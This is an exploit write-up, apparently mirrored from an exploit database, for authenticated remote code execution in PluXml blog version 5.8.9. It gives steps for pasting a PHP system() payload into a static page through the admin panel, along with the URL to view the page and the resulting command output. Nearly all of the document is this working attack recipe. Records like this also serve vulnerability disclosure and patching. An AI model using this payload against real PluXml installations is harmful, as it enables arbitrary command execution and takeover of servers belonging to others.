Share
## https://sploitus.com/exploit?id=PACKETSTORM:176407
## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)  
### Date: 2024-1-7  
### Exploit Author: tmrswrr  
### Category: Webapps  
### Vendor Homepage: https://pluxml.org/  
### Version : 5.8.9  
### Tested on: https://www.softaculous.com/apps/cms/PluXml  
  
1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001  
  
Payload : <?php echo system('id'); ?>  
  
2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1  
  
Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)